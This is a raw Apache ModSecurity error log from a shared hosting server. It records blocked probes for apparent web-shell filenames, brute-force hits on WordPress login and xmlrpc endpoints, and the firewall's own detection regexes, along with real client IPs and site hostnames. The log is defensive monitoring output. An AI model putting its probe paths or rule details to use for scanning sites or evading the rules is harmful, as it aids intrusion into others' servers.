[Tue May 26 16:54:27.332223 2026] [security2:error] [pid 839808:tid 840045] [client 49.151.191.227:40866] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahWC65qtwAfohijxAqhQ6wAAAXM"]
[Tue May 26 16:54:27.410174 2026] [security2:error] [pid 839808:tid 840045] [client 49.151.191.227:40866] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "500"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahWC65qtwAfohijxAqhQ6wAAAXM"]
[Tue May 26 16:54:28.108294 2026] [security2:error] [pid 839808:tid 839944] [client 20.12.190.196:50052] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/wp-test.php"] [unique_id "ahWC7JqtwAfohijxAqhQ-wAAAQ4"]
[Tue May 26 16:54:28.108432 2026] [security2:error] [pid 839808:tid 839944] [client 20.12.190.196:50052] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/wp-test.php"] [unique_id "ahWC7JqtwAfohijxAqhQ-wAAAQ4"]
[Tue May 26 16:54:29.123743 2026] [security2:error] [pid 839808:tid 840000] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC65qtwAfohijxAqhQ8wAAAUY"]
[Tue May 26 16:54:29.583701 2026] [security2:error] [pid 839808:tid 839960] [client 20.12.190.196:50365] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/asd67.php"] [unique_id "ahWC7ZqtwAfohijxAqhRGQAAAR4"]
[Tue May 26 16:54:29.583849 2026] [security2:error] [pid 839808:tid 839960] [client 20.12.190.196:50365] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/asd67.php"] [unique_id "ahWC7ZqtwAfohijxAqhRGQAAAR4"]
[Tue May 26 16:54:29.861606 2026] [security2:error] [pid 839808:tid 839973] [client 139.180.225.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWC7ZqtwAfohijxAqhRHwAAASs"], referer: https://www.anujtradingco.com/
[Tue May 26 16:54:30.484809 2026] [proxy:error] [pid 839808:tid 839903] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:54:30.484872 2026] [proxy_http:error] [pid 839808:tid 839903] [remote 44.249.172.174:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:54:30.485517 2026] [proxy:error] [pid 839808:tid 839903] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:54:30.485553 2026] [proxy_http:error] [pid 839808:tid 839903] [remote 44.249.172.174:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:54:31.200899 2026] [security2:error] [pid 839808:tid 840022] [client 139.180.225.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWC75qtwAfohijxAqhRPgAAAVw"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1267960&moderation-hash=51d662aee3f67300a223b03860fa0e8b
[Tue May 26 16:54:31.329205 2026] [security2:error] [pid 839808:tid 839905] [remote 91.134.89.60:48284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWC75qtwAfohijxAqhRPwABZV4"]
[Tue May 26 16:54:31.371294 2026] [security2:error] [pid 839808:tid 839962] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC7pqtwAfohijxAqhRIwAAASA"]
[Tue May 26 16:54:31.961280 2026] [security2:error] [pid 839808:tid 839942] [client 195.178.110.48:45250] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "triviewsolutions.com"] [uri "/index.php"] [unique_id "ahWC75qtwAfohijxAqhRTwAAAQw"]
[Tue May 26 16:54:32.490068 2026] [security2:error] [pid 839808:tid 839988] [client 20.12.190.196:54226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/Cap.php"] [unique_id "ahWC8JqtwAfohijxAqhRYAAAATo"]
[Tue May 26 16:54:32.490188 2026] [security2:error] [pid 839808:tid 839988] [client 20.12.190.196:54226] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/Cap.php"] [unique_id "ahWC8JqtwAfohijxAqhRYAAAATo"]
[Tue May 26 16:54:32.643183 2026] [security2:error] [pid 839808:tid 840006] [client 14.191.149.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC75qtwAfohijxAqhRQwAAAUw"]
[Tue May 26 16:54:33.187770 2026] [security2:error] [pid 839808:tid 840045] [client 49.151.191.227:40986] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahWC8ZqtwAfohijxAqhRawAAAXM"]
[Tue May 26 16:54:33.263964 2026] [security2:error] [pid 839808:tid 840045] [client 49.151.191.227:40986] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "500"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahWC8ZqtwAfohijxAqhRawAAAXM"]
[Tue May 26 16:54:33.495868 2026] [security2:error] [pid 839808:tid 839989] [client 117.198.37.168:61524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWC8ZqtwAfohijxAqhRdwAAATs"]
[Tue May 26 16:54:33.495955 2026] [security2:error] [pid 839808:tid 839989] [client 117.198.37.168:61524] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWC8ZqtwAfohijxAqhRdwAAATs"]
[Tue May 26 16:54:33.865773 2026] [security2:error] [pid 839808:tid 839967] [client 20.12.190.196:56830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/like.php"] [unique_id "ahWC8ZqtwAfohijxAqhRgwAAASU"]
[Tue May 26 16:54:33.865865 2026] [security2:error] [pid 839808:tid 839967] [client 20.12.190.196:56830] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/like.php"] [unique_id "ahWC8ZqtwAfohijxAqhRgwAAASU"]
[Tue May 26 16:54:33.907463 2026] [security2:error] [pid 839808:tid 840012] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC8JqtwAfohijxAqhRWQAAAVI"]
[Tue May 26 16:54:34.707583 2026] [security2:error] [pid 839808:tid 840031] [client 20.12.190.196:50356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/we.php"] [unique_id "ahWC8pqtwAfohijxAqhRnAAAAWU"]
[Tue May 26 16:54:34.707694 2026] [security2:error] [pid 839808:tid 840031] [client 20.12.190.196:50356] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/we.php"] [unique_id "ahWC8pqtwAfohijxAqhRnAAAAWU"]
[Tue May 26 16:54:35.225230 2026] [security2:error] [pid 839808:tid 840032] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC8ZqtwAfohijxAqhRfgAAAWY"]
[Tue May 26 16:54:37.371724 2026] [security2:error] [pid 839808:tid 839968] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC9JqtwAfohijxAqhRzQAAASY"]
[Tue May 26 16:54:38.678742 2026] [security2:error] [pid 839808:tid 839888] [remote 111.225.148.191:38700] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mosykay.com"] [uri "/products/9956040/"] [unique_id "ahWC9pqtwAfohijxAqhSIQABJ00"]
[Tue May 26 16:54:38.933234 2026] [security2:error] [pid 839808:tid 839975] [client 62.60.130.233:49575] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "altiplanolibros.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWC9pqtwAfohijxAqhSJgAAAS0"], referer: https://duckduckgo.com/
[Tue May 26 16:54:38.959670 2026] [security2:error] [pid 839808:tid 840053] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC9ZqtwAfohijxAqhR_wAAAXs"]
[Tue May 26 16:54:39.263572 2026] [security2:error] [pid 839808:tid 840036] [client 62.60.130.233:60464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "altiplanolibros.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWC95qtwAfohijxAqhSMAAAAWo"], referer: https://www.reddit.com/
[Tue May 26 16:54:39.738123 2026] [security2:error] [pid 839808:tid 839998] [client 104.194.152.141:53824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 141.152.194.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWC95qtwAfohijxAqhSMgAAAUQ"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 16:54:39.738295 2026] [security2:error] [pid 839808:tid 839998] [client 104.194.152.141:53824] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWC95qtwAfohijxAqhSMgAAAUQ"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 16:54:40.467430 2026] [security2:error] [pid 839808:tid 839993] [client 20.12.190.196:56034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/wp.php"] [unique_id "ahWC-JqtwAfohijxAqhSVQAAAT8"]
[Tue May 26 16:54:40.467545 2026] [security2:error] [pid 839808:tid 839993] [client 20.12.190.196:56034] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/wp.php"] [unique_id "ahWC-JqtwAfohijxAqhSVQAAAT8"]
[Tue May 26 16:54:40.809310 2026] [security2:error] [pid 839808:tid 840055] [client 104.194.152.141:53897] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWC-JqtwAfohijxAqhSWgAAAX0"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 16:54:41.518175 2026] [security2:error] [pid 839808:tid 840041] [client 20.12.190.196:56009] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/wp-indx.php"] [unique_id "ahWC-ZqtwAfohijxAqhSbQAAAW8"]
[Tue May 26 16:54:41.518302 2026] [security2:error] [pid 839808:tid 840041] [client 20.12.190.196:56009] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/wp-indx.php"] [unique_id "ahWC-ZqtwAfohijxAqhSbQAAAW8"]
[Tue May 26 16:54:42.282090 2026] [security2:error] [pid 839808:tid 840066] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC-ZqtwAfohijxAqhSYQAAAYg"]
[Tue May 26 16:54:43.046739 2026] [security2:error] [pid 839808:tid 840063] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC-ZqtwAfohijxAqhScAAAAYU"]
[Tue May 26 16:54:44.057874 2026] [security2:error] [pid 839808:tid 840034] [client 117.198.37.168:61845] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWC_JqtwAfohijxAqhSnAAAAWg"]
[Tue May 26 16:54:44.058004 2026] [security2:error] [pid 839808:tid 840034] [client 117.198.37.168:61845] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWC_JqtwAfohijxAqhSnAAAAWg"]
[Tue May 26 16:54:44.507294 2026] [security2:error] [pid 839808:tid 839900] [remote 5.78.119.122:54386] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWC_JqtwAfohijxAqhSoQABOlk"]
[Tue May 26 16:54:45.075823 2026] [security2:error] [pid 839808:tid 840049] [client 62.244.225.226:3312] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWC_JqtwAfohijxAqhSrAAAAXc"]
[Tue May 26 16:54:45.185644 2026] [security2:error] [pid 839808:tid 840060] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC-5qtwAfohijxAqhSlgAAAYI"]
[Tue May 26 16:54:45.399639 2026] [security2:error] [pid 839808:tid 840011] [client 20.12.190.196:56797] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/zoo.php"] [unique_id "ahWC_ZqtwAfohijxAqhSuQAAAVE"]
[Tue May 26 16:54:45.399754 2026] [security2:error] [pid 839808:tid 840011] [client 20.12.190.196:56797] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/zoo.php"] [unique_id "ahWC_ZqtwAfohijxAqhSuQAAAVE"]
[Tue May 26 16:54:47.059214 2026] [security2:error] [pid 839808:tid 839980] [client 114.119.150.15:33805] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ucdc.co.in"] [uri "/upload/UPSC_Entrance_Qualified_List.pdf"] [unique_id "ahWC_5qtwAfohijxAqhS3wAAATI"], referer: https://www.ucdc.co.in/upload/?C=M%3BO%3DA
[Tue May 26 16:54:47.129908 2026] [security2:error] [pid 839808:tid 840051] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC_pqtwAfohijxAqhSzAAAAXk"]
[Tue May 26 16:54:47.676518 2026] [security2:error] [pid 839808:tid 839914] [remote 203.172.89.21:47544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.89.172.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWC_5qtwAfohijxAqhS6wABLmc"]
[Tue May 26 16:54:48.691060 2026] [security2:error] [pid 839808:tid 840011] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC_5qtwAfohijxAqhS6QAAAVE"]
[Tue May 26 16:54:49.620107 2026] [security2:error] [pid 839808:tid 839991] [client 195.178.110.204:34250] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "208.91.198.85"] [uri "/index.cgi"] [unique_id "ahWDAZqtwAfohijxAqhTGAAAAT0"]
[Tue May 26 16:54:49.784090 2026] [security2:error] [pid 839808:tid 840042] [client 20.12.190.196:56790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/wp-link-spm.php"] [unique_id "ahWDAZqtwAfohijxAqhTHQAAAXA"]
[Tue May 26 16:54:49.784214 2026] [security2:error] [pid 839808:tid 840042] [client 20.12.190.196:56790] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/wp-link-spm.php"] [unique_id "ahWDAZqtwAfohijxAqhTHQAAAXA"]
[Tue May 26 16:54:50.809667 2026] [security2:error] [pid 839808:tid 839960] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDAZqtwAfohijxAqhTFwAAAR4"]
[Tue May 26 16:54:50.841653 2026] [security2:error] [pid 839808:tid 839922] [remote 217.112.89.35:51568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahWDApqtwAfohijxAqhTLgABL28"]
[Tue May 26 16:54:50.914383 2026] [security2:error] [pid 839808:tid 839978] [client 20.12.190.196:54257] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/wp-link-snpm.php"] [unique_id "ahWDApqtwAfohijxAqhTLwAAATA"]
[Tue May 26 16:54:50.914474 2026] [security2:error] [pid 839808:tid 839978] [client 20.12.190.196:54257] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/wp-link-snpm.php"] [unique_id "ahWDApqtwAfohijxAqhTLwAAATA"]
[Tue May 26 16:54:51.641735 2026] [security2:error] [pid 839808:tid 839957] [client 176.99.12.164:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWDA5qtwAfohijxAqhTQAAAARs"]
[Tue May 26 16:54:51.642518 2026] [security2:error] [pid 839808:tid 839946] [client 176.99.12.164:53104] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/"] [unique_id "ahWDA5qtwAfohijxAqhTPgABEHY"]
